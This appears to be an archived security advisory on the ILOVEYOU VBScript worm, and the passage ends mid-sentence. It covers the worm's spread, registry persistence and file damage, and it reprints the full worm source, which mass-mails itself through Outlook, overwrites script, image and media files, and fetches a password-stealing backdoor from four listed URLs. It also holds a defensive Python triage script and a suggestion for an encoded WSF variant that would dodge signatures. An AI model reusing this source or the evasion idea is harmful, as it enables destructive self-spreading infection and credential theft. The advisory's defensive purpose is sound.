COMMAND
ILOVEYOU (worm)
SYSTEMS AFFECTED
Almost any system based on MS Windows
PROBLEM
Huh... Due to the big mess this worm created, here's some info about
it. A dangerous Visual Basic Script (VBScript) virus, dubbed the
"LoveLetter" or "ILOVEYOU" virus, has been spreading itself across
the Internet through email via Microsoft Outlook and through
Internet Relay Chat (IRC) using a popular IRC client named mIRC.
The virus can activate whenever the Windows Script Host features
are enabled (this description is from the ISS advisory).
Mail servers may incur mild to severe overloading and could crash
when flooded with an unexpected number of the ILOVEYOU messages.
The actual VBScript code performs a number of destructive tasks:
- modifies and creates various Windows registry entries
- launches Internet Explorer to download a backdoor program
which, once installed, captures network passwords and emails
this data to an account in the Philippines
- infects the local machine by creating many new copies of
itself and overwriting or hiding data files of specific
file types (including VBScript, JavaScript, JPEG, and
MP2/MP3)
- spreads itself to other users by using information from the
Microsoft Outlook Address Book, as well as mIRC's DCC
feature, which allows chat participants to exchange files
Visual Basic Scripts can be executed if Windows Script Host (WSH)
is installed and enabled. Windows Script Host is installed by
default with Windows 98 and with Internet Explorer version 4.0
and later. The message is easy to identify. The subject is
always "ILOVEYOU", and the body of the email only contains the
message "kindly check the attached LOVELETTER coming from me."
The email contains a single instance of the virus in the form of
an attachment named "LOVE-LETTER-FOR-YOU.TXT.vbs".
For each address list that is found, a counter is kept in the
registry to track the number of users that have been mailed. The
number of email addresses in the address list is also recorded.
If the number of addresses in the list increases, the virus will
enumerate the individuals again and send out the "ILOVEYOU" mail
to those who have not previously received it. All flags are kept
in HKEY_CURRENT_USER\Software\Microsoft\WAB.
The virus uses Internet Explorer to connect to one of four HTTP
locations in an attempt to download a backdoor program called
WIN-BUGSFIX.EXE. This backdoor program captures any network
passwords it identifies and automatically emails this information
to a mail account in the Philippines, controlled by the author of
the virus. Before Internet Explorer is launched, the following
registry entry, which sets the Internet Explorer start page, is
changed to one of four URLs at random:
\Software\Microsoft\Internet Explorer\Main\Start Page
After the executable is downloaded, the start page value is set to
"about:blank". The following registry entry is created (under
HKEY_LOCAL_MACHINE) to launch WIN-BUGSFIX.EXE at boot-time:
\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX.EXE
It seems the WIN-BUGSFIX.exe file will email any cached passwords
to MAILME@SUPER.NET.PH. Zoa_Chien points out that the
WIN-BUGSFIX.exe program connects to the SMTP server at
199.108.232.1 port 25 to send out its email message. You should
block the address at your firewall. The message looks as follows:
To: mailme@super.net.ph
Subject: Barok... email.passwords.sender.trojan
X-Mailer: Barok... email.passwords.sender.trojan---by: spyder
Host: kakker
Username: Default
IP Address: 10.67.101.123
RAS Passwords:
Cache Passwords:
BLABLA\MPM : xxx
BJORN\MUSIC : xxx
TOM\SHARED : xxx
TOM2\MP3 : xxx
www.server.com/ : xxx:xxx
MAPI : MAPI
where all xxx's stand for plaintext usernames and passwords of SMB
shares in the subnet.
The virus identifies any "Fixed" or "Removable" drives connected
to the system and recursively visits each folder, overwriting
files of any of the following extensions with a copy of itself,
changing the extension to ".vbs" and deleting the original file:
vbs - Visual Basic Script
vbe - Visual Basic Script (Encoded)
js - JavaScript
jse - JavaScript (Encoded)
css - Cascading Style Sheets
wsh - Windows Script Host
sct - Scriptlet file
hta - HTML Application
The virus deletes any .jpg and .jpeg compressed image files, and
replaces them with a copy of the virus with ".vbs" appended to the
end of the original file name. Original copies of any MP3 or MP2
audio files found are preserved, but a copy of the virus is
created using the same file name with ".vbs" appended. The
original MP2/MP3 file's attributes will be changed so the file is
hidden.
If any of the files "mirc32.exe", "mlink32.exe", "mirc.ini",
"script.ini", or "mirc.hlp" are found, a new default
initialization script named "script.ini" is created in the same
directory:
[script]
;mIRC Script
; Please dont edit this script... mIRC will corrupt, if mIRC will
; corrupt... WINDOWS will affect and will not run correctly. thanks
;
;Khaled Mardam-Bey
;http://www.mirc.com
;
n0=on 1:JOIN:#:{
n1= /if ( $nick == $me ) { halt }
n2= /.dcc send $nick &dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
n3=}
This script will attempt to send a copy of the pre-generated HTML
page to any user who is seen joining any channel you are in on
IRC.
Steve Wolfe posted a brief analysis of the "iloveyou" worm. The
virus proliferates itself via email, sending letters with the
subject "ILOVEYOU", and in the body, "kindly check the attached
LOVELETTER coming from me." Attached is a VBScript file called
"I-LOVE-YOU.TXT.vbs". The capitalization is apparently an
attempt to fool users who are not looking carefully: upon
seeing the ".TXT", they think the file is a (safe) text file and
run it. Once executed, the script does the following:
1. If the key "HKEY_CURRENT_USER\Software\Microsoft\Windows
Scripting Host\Settings\Timeout" is set to a positive number
in the registry, it is set to zero. If it is not present, it
is not affected.
2. The VBScript then saves a copy of itself to:
(a). \%%WINDIR%%\Win32DLL.vbs
(b). \%%SYSDIR%%\MSKernel32.vbs
(c). \%%SYSDIR%%\LOVE-LETTER-FOR-YOU.TXT.vbs
3. Sets the appropriate registry entries to start it on boot:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32 => (b)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL => (a)
4. Changes the MSIE home page to a presumably malicious URL. If
the file "WinFAT32.exe" exists, then it sets the startup page
(contained in the registry setting
(HKCU\Software\Microsoft\Internet Explorer\Main\Start Page)
to one of the following URLs:
http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe
http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe
http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe
http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe
5. If the "WIN-BUGSFIX.exe" file exists, it then sets it to run
at boot:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX => (download directory)\win-bugsfix.exe
and also sets the MSIE startup page to about:blank (a blank
page).
6. It then prints out HTML, containing these messages:
This HTML file need ActiveX Control
To Enable to read this HTML file
- Please press #-#YES#-# button to Enable ActiveX
7. The ActiveX then sets the registry entries to make it run at
boot, as in step #3, and writes the files as in step 2.
8. The virus spreads itself. It opens up a MAPI connection to
your Outlook address list, and sends a copy of itself to each
of the entries.
9. Enumerates disk drives and infects files.
In infecting the files, it searches each of the drives found,
and does the following:
(A) Any file with the extensions .vbs, .vbe, .js, .jse, .css,
.wsh, .sct, .hta, .jpg, or .jpeg is replaced with a copy
of the virus. Then, it appears that a copy of the virus
is also written to the name of the file with ".vbs"
attached - for example, "logo.jpg" would be replaced with
the virus, and a file called "logo.jpg.vbs" would be
created as well.
(B) If any file with the extensions .mp2 or .mp3 is
encountered it will mark that file as hidden, then it will
create a copy of itself with that name with the .vbs
extensions - for example, "macarena.mp3" would be hidden,
and a copy of the virus written to "macarena.mp3.vbs".
(C) If mirc32.exe, mirc.ini, script.ini, mirc.hlp or
mlink32.exe is encountered it will write to the script.ini
in that directory, and modify it so that anyone joining a
channel will be automatically sent a copy of
LOVE-LETTER-FOR-YOU.htm, containing the virus.
It seems a couple of variations of the worm are going around. At
least one uses a subject line of "Joke" or "fw: Joke" with an
attachment called VeryFunny.vbs; another is the one that talks
about Mother's Day.
You can find the source of the original worm at:
http://www.securityfocus.com/templates/archive.pike?list=82&msg=3911840F.D7597030@thievco.com&part=.1
Here it is:
rem barok -loveletter(vbe) <i hate go to school>
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start
Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or
(s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick
"&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META
NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _
"<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-?
@GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _
"<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is
good...@-@>"&vbcrlf& _
"<?-?HEAD><BODY
ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#
-#,#-#main#-#)@-@ "&vbcrlf& _
"ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#
-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _
"<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read
this HTML file<BR>- Please press #-#YES#-# button to Enable
ActiveX<?-?p>"&vbcrlf& _
"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@
BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE>
"&vbcrlf& _
"<?-?BODY><?-?HTML>"&vbcrlf& _
"<SCRIPT language=@-@JScript@-@>"&vbcrlf& _
"<!--?-??-?"&vbcrlf& _
"if (window.screen){var wi=screen.availWidth;var
hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"&vbcrlf& _
"<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _
"<!--"&vbcrlf& _
"on error resume next"&vbcrlf& _
"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _
"aw=1"&vbcrlf& _
"code="
dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _
"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _
"set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _
"wri.write code4"&vbcrlf& _
"wri.close"&vbcrlf& _
"if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _
"if (err.number=424) then"&vbcrlf& _
"aw=0"&vbcrlf& _
"end if"&vbcrlf& _
"if (aw=1) then"&vbcrlf& _
"document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _
"window.close"&vbcrlf& _
"end if"&vbcrlf& _
"end if"&vbcrlf& _
"Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _
"regedit.RegWrite
@-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Ru
n^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"
dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
set fso=CreateObject("Scripting.FileSystemObject")
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines)
lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37))
if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
end if
next
set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")
b.close
set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub
ISS and others had become aware of several other variants of this
virus as shown below. Please note that modifying the virus is
trivial and that new versions may be distributed at any time.
- Subject: fwd: Joke
Attachment: Very Funny.vbs
- Subject: Susitikim shi vakara kavos puodukui...
Body: kindly check the attached LOVELETTER coming from me.
Attachment: LOVE-LETTER-FOR-YOU.TXT.vbs
- Subject: Mothers Day Order Confirmation
Body: We have proceeded to charge your credit card for the
amount of $326.92 for the mothers day diamond special. We
have attached a detailed invoice to this email. Please
print out the attachment and keep it in a safe place. Thanks
Again and Have a Happy Mothers Day!
mothersday@subdimension.com
Attachment: mothersday.vbs
When the attachment is opened, the malicious VBScript code
launches, performing the following operations in sequence:
- The virus removes the timeout associated with the Windows
scripting unit by changing the value of the
HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout
registry key.
- The virus copies itself to SYSTEMDIR\MSKernel32.vbs,
WINDIR\Win32DLL.vbs, and SYSTEMDIR\LOVE-LETTER-FOR-YOU.TXT.vbs
- The following registry entries are created under
HKEY_LOCAL_MACHINE, such that the MSKernel32.vbs and
Win32DLL.vbs copies will be launched at boot-time:
\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL
Win32DLL.vbs is created as a service.
- An HTML file named LOVE-LETTER-FOR-YOU.HTM is created for
later use (in the mIRC script) and placed in the Windows
SYSTEMDIR. Typically, WINDIR is C:\WINDOWS and SYSTEMDIR is
C:\WINDOWS\SYSTEM.
- The virus attempts to spread itself via e-mail using Microsoft
Outlook. It sends a message to all addresses found in every
address book. Each individual is flagged in the registry after
they have been sent a copy.
For each address list that is found, a counter is kept in the
registry to track the number of users that have been mailed.
The number of email addresses in the address list is also
recorded. If the number of addresses in the list increases,
the virus will enumerate the individuals again and send out
the "ILOVEYOU" mail to those who have not previously received
it.
All flags are kept in HKEY_CURRENT_USER\Software\Microsoft\WAB
- The virus uses Internet Explorer to connect to one of four HTTP
web locations in an attempt to download a backdoor program
called WIN-BUGSFIX.EXE. This backdoor program captures any
network passwords it identifies and automatically emails this
information to a mail account in the Philippines, presumably
controlled by the author of the virus.
The original download locations for the WIN-BUGSFIX.EXE file
seem to be invalid. Be aware that modified versions of the
virus may point to valid copies of the backdoor, so this is
still a threat. Before Internet Explorer is launched, the
following registry entry, which sets the Internet Explorer
start page, is changed to one of four URLs at random:
\Software\Microsoft\Internet Explorer\Main\Start Page
After the executable is downloaded, the start page value is
set to "about:blank". The Mother's Day variation of the
virus does not attempt to install the backdoor, but does
modify the Internet Explorer start page.
- The following registry entry is created (under
HKEY_LOCAL_MACHINE) to launch WIN-BUGSFIX.EXE at boot-time:
\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX.EXE
- The virus identifies any local or network drives connected to
the system and recursively visits each folder, overwriting
files of any of the following extensions with a copy of
itself, changing the extension to ".vbs" and deleting the
original file:
vbs - Visual Basic Script
vbe - Visual Basic Script (Encoded)
js - JavaScript
jse - JavaScript (Encoded)
css - Cascading Style Sheets
wsh - Windows Scripting Host
sct - Scriptlet file
hta - HTML Application
The virus deletes any ".jpg" and ".jpeg" compressed image
files, replacing each with a copy of the virus with ".vbs"
appended to the end of the original file name. The Mother's Day
variation of the virus removes files of type ".ini" (Windows
script files) and ".bat" (DOS batch files) instead of ".jpg"
and ".jpeg". Original copies of any MP3 or MP2 audio files
found are preserved, but a copy of the virus is created using
the same file name with ".vbs" appended. The original MP2/MP3
file's attributes will be changed so the file is hidden.
- If any of the files "mirc32.exe", "mlink32.exe", "mirc.ini",
"script.ini", or "mirc.hlp" are found, a new default
initialization script named "script.ini" is created in the
same directory:
[script]
;mIRC Script
; Please dont edit this script... mIRC will corrupt, if mIRC will
; corrupt... WINDOWS will affect and will not run correctly. thanks
;
;Khaled Mardam-Bey
;http://www.mirc.com
;
n0=on 1:JOIN:#:{
n1= /if ( $nick == $me ) { halt }
n2= /.dcc send $nick &dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
n3=}
This script will attempt to send a copy of the pre-generated
HTML page to any user who is seen joining any channel you are
in on IRC.
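An added host-side triage example (my own code, not from the ISS advisory or any vendor tool) for the sequence above: it parses a regedit .reg export for the Run/RunServices autostart values, the zeroed Windows Scripting Host Timeout and the WAB mailing flags, then walks a directory tree for the dropped copies, the "name.mp3.vbs"-style shadow files and the rewritten mIRC script.ini. The export text and the file tree are constructed samples; key names and file names are the ones this page lists.

```python
import re
import tempfile
from pathlib import Path

# Keys named on this page: autostart values in the first two, the WSH timeout
# the worm zeroes in the third, its per-address mailing flags in the fourth.
RUN_KEY = r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"
RUNSERVICES_KEY = r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices"
WSH_SETTINGS_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings"
WAB_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\WAB"
AUTOSTART_VALUES = {RUN_KEY: {"mskernel32", "win-bugsfix"}, RUNSERVICES_KEY: {"win32dll"}}

# Dropped file names, the worm's first comment line, and its mIRC auto-send script.
DROPPED_NAMES = {"mskernel32.vbs", "win32dll.vbs", "love-letter-for-you.txt.vbs",
                 "love-letter-for-you.htm", "win-bugsfix.exe", "very funny.vbs"}
BODY_MARKER = b"rem barok -loveletter"
MIRC_AUTOSEND = re.compile(rb"on\s+1:JOIN:#:\{.*?dcc\s+send\s+\$nick", re.S | re.I)
MEDIA_EXTS = {"mp3", "mp2", "jpg", "jpeg"}

def parse_reg_export(text: str) -> dict:
    """Parse a regedit .reg export into {key (lowercased): {value name: data}}; string and dword only."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            keys.setdefault(current, {})
        elif current is not None and line.startswith('"') and '"=' in line:
            name, _, data = line[1:].partition('"=')
            if data.startswith("dword:"):
                keys[current][name] = int(data[6:], 16)
            else:  # .reg doubles backslashes inside string data
                keys[current][name] = data.strip('"').replace("\\\\", "\\")
    return keys

def registry_indicators(keys: dict) -> list[str]:
    """Report the worm's persistence values, zeroed timeout and address-book flags."""
    hits = []
    for key, names in AUTOSTART_VALUES.items():
        for vname, data in keys.get(key.lower(), {}).items():
            if vname.lower() in names:
                hits.append(f"autostart {key}\\{vname} -> {data}")
    if keys.get(WSH_SETTINGS_KEY.lower(), {}).get("Timeout") == 0:
        hits.append("WSH Timeout forced to 0")
    for vname in keys.get(WAB_KEY.lower(), {}):  # one value per address already mailed
        if "@" in vname:
            hits.append(f"WAB mailing flag for {vname}")
    return hits

def file_indicators(root: Path) -> list[str]:
    """Walk a tree for dropped copies, shadowed media files and a modified script.ini."""
    hits = []
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        rel, lname = path.relative_to(root).as_posix(), path.name.lower()
        if lname in DROPPED_NAMES:
            hits.append(f"dropped file {rel}")
        if lname.endswith(".vbs"):
            if BODY_MARKER in path.read_bytes()[:4096].lower():
                hits.append(f"worm body in {rel}")
            inner = lname[:-4].rsplit(".", 1)  # macarena.mp3.vbs -> ['macarena', 'mp3']
            if len(inner) == 2 and inner[1] in MEDIA_EXTS:
                hits.append(f"media file shadowed by {rel}")
        if lname == "script.ini" and MIRC_AUTOSEND.search(path.read_bytes()):
            hits.append(f"mIRC auto-send script {rel}")
    return hits

# Constructed .reg export (not a real capture) in the REGEDIT4 format of the era.
SAMPLE_REG = r"""REGEDIT4
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"SystemTray"="SysTray.Exe"
"MSKernel32"="C:\\WINDOWS\\SYSTEM\\MSKernel32.vbs"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]
"Win32DLL"="C:\\WINDOWS\\Win32DLL.vbs"
[HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings]
"Timeout"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\WAB]
"bob@example.test"=dword:00000001
"""

def build_sample_tree(root: Path) -> None:
    """Constructed artefacts mimicking an infected machine; not a real capture."""
    (root / "WINDOWS" / "SYSTEM").mkdir(parents=True)
    (root / "WINDOWS" / "SYSTEM" / "MSKernel32.vbs").write_bytes(
        b"rem barok -loveletter(vbe) <i hate go to school>\r\nOn Error Resume Next\r\n")
    (root / "music").mkdir()
    (root / "music" / "macarena.mp3.vbs").write_bytes(b"rem barok -loveletter(vbe)\r\n")
    (root / "mirc").mkdir()
    (root / "mirc" / "script.ini").write_bytes(
        b"[script]\r\nn0=on 1:JOIN:#:{\r\nn1= /if ( $nick == $me ) { halt }\r\n"
        b"n2= /.dcc send $nick C:\\WINDOWS\\SYSTEM\\LOVE-LETTER-FOR-YOU.HTM\r\nn3=}\r\n")

def scan_sample() -> tuple[list[str], list[str]]:
    """Run both checks on the constructed data; returns (registry hits, file hits)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_sample_tree(root)
        return registry_indicators(parse_reg_export(SAMPLE_REG)), file_indicators(root)
```

On a live machine, export the four keys with regedit and point file_indicators at each fixed or removable drive root, since the worm walks all of them.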
Sean Malloy lets us know that changing the virus to use a
WSF extension instead of VBS is just as effective. WSF stands
for Windows Scripting File. Antivirus vendors that want to be
proactive might want to add this extension to their signatures.
The file contents would look something like this:
<job id="iloveyou">
<script language="VBScript">
'insert code here
</script>
</job>
or, as Sean points out, it could be encoded to obfuscate it:
<job id="iloveyouencrypted">
<script language="VBScript.Encode">
#@~^EQAAAA==vbxd^?DDPmKN^?~t^?DnOwYAAA==^#~@
</script>
</job>
where "#@~^EQAAAA==vbxd^?DDPmKN^?~t^?DnOwYAAA==^#~@" is the
encoded worm. It seems the "fwd: Joke" variant attachment is
